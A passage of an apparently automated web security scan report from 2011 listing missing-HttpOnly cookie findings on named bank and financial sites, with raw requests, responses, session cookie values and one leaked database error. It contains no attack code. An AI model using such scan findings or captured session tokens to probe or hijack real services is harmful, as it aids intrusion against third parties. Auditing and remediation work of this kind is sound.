Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 03 May 2011 13:58:22 GMT
Connection: close
Set-Cookie: _xgcid=F0929C0D59500951D2AAEB0F1F42D2D8; Domain=.xgraph.net; Expires=Fri, 02-May-2014 13:58:22 GMT; Path=/
Set-Cookie: _xguid=EEA5D446096D5054209EFA44A2E03874; Domain=.xgraph.net; Expires=Fri, 02-May-2014 13:58:22 GMT; Path=/
Set-Cookie: _mpush=A9F8E6728D95BAA8B046FEDC4DCC8AA2; Domain=.xgraph.net; Expires=Fri, 02-May-2014 13:58:22 GMT; Path=/
Set-Cookie: _push4xgat=1304431102083; Domain=.xgraph.net; Expires=Wed, 04-May-2011 13:58:22 GMT; Path=/
P3P: CP="NOI NID DSP LAW PSAa PSDa OUR BUS UNI COM NAV STA", policyref="http://xcdn.xgraph.net/w3c/p3p.xml"

GIF89a.............!.......,...........D..;

16. Cookie without HttpOnly flag set  previous  next
There are 180 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



16.1. https://csc.scb.co.th/webclient1/bcm_signin.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://csc.scb.co.th
Path:   /webclient1/bcm_signin.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webclient1/bcm_signin.jsp?language=en HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 13:18:36 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=B3C43FADCB6A264B281F22BCE4AD66BD; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>

<head>
<title>SCB BCM Customer Service</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, .......
...[SNIP]...

16.2. https://csc.scb.co.th/webclient1/cllcntr_en.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://csc.scb.co.th
Path:   /webclient1/cllcntr_en.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webclient1/cllcntr_en.jsp HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:39 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=2B76E091D3134A07F2F9324059D9B802; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Welcome to SCB Call Center</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, ................,
...[SNIP]...

16.3. https://csc.scb.co.th/webclient1/index.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://csc.scb.co.th
Path:   /webclient1/index.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webclient1/index.jsp HTTP/1.1
Host: csc.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 12:55:46 GMT
Server: Microsoft-IIS/6.0
Set-Cookie: JSESSIONID=CC747F2754B344B97C30E95EF0643E33; Path=/webclient1; Secure
Content-Type: text/html;charset=TIS-620

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html>
<head>
<title>Welcome to SCB Call Center</title>
<meta name="Keywords" content="csc.scb.co.th, scb.co.th, ................,
...[SNIP]...

16.4. http://dev.piwik.org/trac/browser/trunk/js/piwik.js  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://dev.piwik.org
Path:   /trac/browser/trunk/js/piwik.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /trac/browser/trunk/js/piwik.js HTTP/1.1
Host: dev.piwik.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:20:08 GMT
Server: Apache
Cache-control: must-revalidate
Content-Length: 315658
Set-Cookie: trac_form_token=73f996c1b634e98a9540d5d3; Path=/trac
Set-Cookie: trac_session=d2fe43411ec226facbae5c5f; expires=Mon, 01-Aug-2011 13:20:11 GMT; Path=/trac
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
<title>
/tr
...[SNIP]...

16.5. https://dimenxion.bangkokbank.com/bonprd/jsp/common/loginfiles/es.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://dimenxion.bangkokbank.com
Path:   /bonprd/jsp/common/loginfiles/es.jsp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /bonprd/jsp/common/loginfiles/es.jsp HTTP/1.1
Host: dimenxion.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 19:35:18 GMT
Server: Oracle-Application-Server-10g/10.1.2.2.0 Oracle-HTTP-Server
Content-Length: 5649
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Set-Cookie: ccms=10.95.56.51.13394661304451318391; path=/
Set-Cookie: JSESSIONID=0a5f4b3e30d9ddc093444b3a40dd8dfffd1456956e4f.e38MchiTchqSb40LbxmSb3uLb30Se6fznA5Pp7ftolbGmkTy; path=/bonprd; secure
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Language: en


<html>
<head>
<title>Dimenxion</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="javascript" src="../../../js/statusbar.js"></script>
<script>
docume
...[SNIP]...

16.6. http://group.barclays.com/Citizenship/Community-Investment  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /Citizenship/Community-Investment

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Citizenship/Community-Investment HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=68; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454104927:ss=1304454046661; __unam=2099162-12fb6735ea2-70159163-2

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:55 GMT
Set-Cookie: JSESSIONID=CA839B7D4576D701F5DE88D9B54EFFC2.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 09:43:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 31439


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

16.7. http://group.barclays.com/Home  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /Home

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Home HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:41 GMT
Set-Cookie: JSESSIONID=5CD5AD2CEB05AFE9E8626B6D83A7F428.tomcat_1_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 10:20:41 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 34675


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

16.8. http://group.barclays.com/Sitemap  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /Sitemap

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Sitemap HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __switchTo5x=68; __unam=2099162-12fb6735ea2-70159163-3; WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454115176:ss=1304454046661

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:22:05 GMT
Set-Cookie: JSESSIONID=F3D4B051FE6DC03D4D0B13732A1CAC8A.tomcat_2_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 10:21:07 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 33358


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

16.9. http://group.barclays.com/What-we-do/Sponsorship/Community-sponsorship  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /What-we-do/Sponsorship/Community-sponsorship

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /What-we-do/Sponsorship/Community-sponsorship HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WT_FPC=id=22a3393bfe12a9f24e71304454046661:lv=1304454061117:ss=1304454046661

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:44 GMT
Set-Cookie: JSESSIONID=A27A687978F449F8DADD8F8B71913013.tomcat_1_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 10:21:44 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 25029


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

16.10. http://group.barclays.com/cs/Satellite  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /cs/Satellite

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cs/Satellite?blobcol=urldata&blobkey=id&blobtable=MungoBlobs&blobwhere=1231874111043&ssbinary=true HTTP/1.1
Host: group.barclays.com
Proxy-Connection: keep-alive
Referer: http://group.barclays.com/Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=279736CC063C1B2534CB7417BD0DAEC7.tomcat_1_1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:20:48 GMT
Set-Cookie: JSESSIONID=68260B4B0A24869558A521A45621A758.tomcat_2_1; Path=/cs
Last-Modified: Tue, 03 May 2011 08:08:05 GMT
Content-Type: image/gif
Content-Length: 49929

.PNG
.
...IHDR.......l.....L..'....sRGB.........gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....IDATx^|..T.....eKw...
w..pwwwww.!....'..$...%...C.....}.y....|.>...1......BBH.r.{...\?.c.
...[SNIP]...

16.11. http://group.barclays.com/favicon.ico  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://group.barclays.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: group.barclays.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:18:20 GMT
Set-Cookie: JSESSIONID=CB14CE0B2823EF4971F0F1F69E05FDCF.tomcat_1_1; Path=/cs
Cache-Control: no-store
Last-Modified: Tue, 03 May 2011 13:18:20 GMT
Content-Type: text/html;charset=UTF-8
Content-Length: 21260


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   <html xmlns="http://www.w3.org/1999/xhtml" lang="en-gb" xml:lang="en-gb"
...[SNIP]...

16.12. https://ibank.barclays.co.uk/olb/w/LoginMember.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ibank.barclays.co.uk
Path:   /olb/w/LoginMember.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /olb/w/LoginMember.do HTTP/1.1
Host: ibank.barclays.co.uk
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: olbvisitor=1304385986443869302501514846; tabIndex=1; WT_FPC=id=2e6a8286f3ae7c7522a1304421997884:lv=1304421997884:ss=1304421997884; WLBC=640359596.32800.0000

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:21:04 GMT
Content-type: text/html
Pragma: No-cache
Cache-control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-language: en-GB
Set-cookie: JSESSIONID=0000ziQlhDB4stFnSq4TdsC4pxF:r4ap-RolbClusterB-server09; Path=/; Secure
Set-cookie: tabIndex=1; Expires=Wed, 02 May 2012 10:21:03 GMT; Path=/
Content-Length: 22816

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xm
...[SNIP]...

16.13. https://icustody.bangkokbank.com/Signon.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://icustody.bangkokbank.com
Path:   /Signon.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Signon.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: icustody.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 9037
Content-Type: text/html; charset=utf-8
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=aclvmlauo12lpz550gbait45WTLOatnbmQwqJ+vmLol1xkpu6hw=; path=/
Date: Tue, 03 May 2011 19:35:00 GMT


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >
<HTML>
   <HEAD>
       <title>SignOn</title>
       <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">
       <meta content="C#"
...[SNIP]...

16.14. https://ifunds.bangkokbank.com/Login.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://ifunds.bangkokbank.com
Path:   /Login.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Login.aspx?ReturnUrl=%2fdefault.aspx HTTP/1.1
Host: ifunds.bangkokbank.com
Connection: keep-alive
Referer: http://www.bangkokbank.com/_layouts/nr/AccountAccess/account.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: _cbclose=1; _cbclose7180=1; _uid7180=D4196A67.2

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 11188
Content-Type: text/html; charset=windows-874
Expires: -1
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=yrla5afsutwfsv45nwjra145; path=/
Date: Tue, 03 May 2011 19:34:32 GMT


<HTML>
   <HEAD>
       <title>Bualuang iFunds</title>
       <META http-equiv="Content-Type" content="text/html; charset=windows-874">
       <meta name="vs_targetSchema" content="http://schemas.microsoft.com/i
...[SNIP]...

16.15. https://kcustodian.kasikornbank.com/KCustodian/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://kcustodian.kasikornbank.com
Path:   /KCustodian/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /KCustodian/ HTTP/1.1
Host: kcustodian.kasikornbank.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:41 GMT
Server: IBM_HTTP_Server/6.0.2.43 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00002lQTK90JV_QrtQRFqbx3dcx:-1; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 40571


<HTML>
<head>
<script language="Javascript">
</script>

<script language="JavaScript">

<!--
function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a
...[SNIP]...

16.16. http://m1645.ic-live.com/515/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://m1645.ic-live.com
Path:   /515/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /515/?120309983&OVMTC=Broad&site=&creative=13009393759&OVKEY=internet%20banks&url_id=120309983/x22 HTTP/1.1
Host: m1645.ic-live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A90CA7BE414083D63F763116609BD757.mch2-rdr-1; Path=/
Set-Cookie: ngx_userid=173.193.214.243:1304429032578; Domain=.ic-live.com; Expires=Thu, 02-May-2013 13:23:52 GMT; Path=/
Set-Cookie: pid2=130442903345Pdn0xP+YDR99; Domain=.ic-live.com; Expires=Wed, 02-May-2012 13:23:52 GMT; Path=/
Set-Cookie: sid1645=130442903345Pdn0xP+YDR99; Domain=.ic-live.com; Path=/
Set-Cookie: cvt515=120309983; Domain=.ic-live.com; Expires=Thu, 02-Jun-2011 13:23:52 GMT; Path=/
Set-Cookie: ngx_120309983=2011-05-03:06:23:52; Domain=.ic-live.com; Expires=Wed, 04-May-2011 13:23:52 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP CURa ADMa DEVa TAIa PSAa OUR BUS IND UNI COM NAV INT"
Location: http://www.pncsites.com/LP/Checking/VWPerformance/default.html?WT.mc_id=11SRCH_Search_0148&WT.srch=1
Date: Tue, 03 May 2011 13:23:51 GMT
Connection: close


16.17. http://marketdata.set.or.th/mkt/topten.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://marketdata.set.or.th
Path:   /mkt/topten.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mkt/topten.do?language=en&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Content-Language: en-US
Set-Cookie: JSESSIONID=23A1B718BE31C3B5E88C96682836394A; Path=/mkt
Content-Length: 57003


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=23A1B718BE31C3B5E88C96682836394A" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...

16.18. http://moneytalk.scb.co.th/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: moneytalk.scb.co.th
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:24:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 29865
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSRQSAA=BCHFIDBAABFIJLACEEOOLLMM; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->


<!-- Check Parameter -->

<html>
<head>
<title>Welcome to Money Talk</title>
<meta http-equiv="C
...[SNIP]...

16.19. http://moneytalk.scb.co.th/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: moneytalk.scb.co.th
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 13:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 764
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQTQRTAB=GEOJLEJDGIKJLKHHJGMGMDID; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- Check Parameter -->
<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=
...[SNIP]...

16.20. http://moneytalk.scb.co.th/index.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://moneytalk.scb.co.th
Path:   /index.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /index.asp?FileName=TH&1=1 HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 18:03:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 30024
Content-Type: text/html
